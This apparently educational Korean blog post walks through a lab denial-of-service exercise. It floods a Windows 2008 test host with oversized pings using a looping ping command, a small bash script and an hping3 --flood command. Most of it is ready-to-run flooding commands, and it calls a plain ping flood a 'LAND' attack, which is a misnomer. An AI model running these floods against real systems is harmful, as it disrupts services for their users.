ICMP LAND 공격 (Dos Attack)
ICMP LAND ATTACK
ICMP 메세지를 시스템, 서버, 전송 장비에게 대량으로 전송하여 네트워크 및 시스템 부하를
발생시키는 공격이다.
Ex1) ICMP LAND Attack 1
<Linux200>
gnome-system-monitor 실행
# gnome-system-monitor &
<Window2008>
C:\Users\administrator>ping 192.168.20.200 -t -l 50000
...
...
192.168.20.200의 응답: 바이트=50000 시간=1ms TTL=64
Ctrl + C
<Linux200>
gnome-system-monitor 확인 (Network History 모니터링)
Ex2) ICMP LAND Attack 2
<Window2008>
작업 관리자 실행(Ctrl + Shift + Esc) -> 네트워킹
<Kali Linux>
ICMP LAND 공격 툴 제작
# mkdir -p /root/bin ; cd /root/bin
# vi ping.sh
|
#!/bin/bash
ping -s 62000 192.168.20.201 & sleep 10
ping -s 62000 192.168.20.201 & sleep 10
ping -s 62000 192.168.20.201 & sleep 10 |
# chmod +x ping.sh
Window2008로 ping attack
# ./ping.sh 192.168.20.201
....
....
Ctrl + C
# pkill ping
# rm ping.sh
<Window2008>
작업 관리자 네트워킹 확인
Ex3) ICMP LAND Attack 3
<Kali Linux>
hping3 를 이용한 공격
-1 : icmp scan
--flood : flooding
-p : port number
-d : data size
# hping3 -1 192.168.20.201 --flood -p 80 -d 62000
<Window2008>
작업 관리자 네트워킹 확인
위와 같은 부하량을 주는 명령어 및 프로그램은 대상에게 1% 정도의 이용률을 줄수 있다면
같은 동작을 100번 수행 한다면 대상 네트워크 이용률을 100% 과부하를 줄 수 있다.
관련 참고내용
'Learning > └◆Network Hacking' 카테고리의 다른 글
| 네트워크 해킹 - 07. 로컬 시스템 부하 공격(Dos Attack) (0) | 2017.01.22 |
|---|---|
| 네트워크 해킹 - 06. TCP Syn Flooding Attack (Dos Attack) (0) | 2017.01.22 |
| 네트워크 해킹 - 04. TCP & UDP 프로토콜 (0) | 2017.01.22 |
| 네트워크 해킹 - 03. ICMP 프로토콜 & ICMP Flooding 공격 (0) | 2017.01.22 |
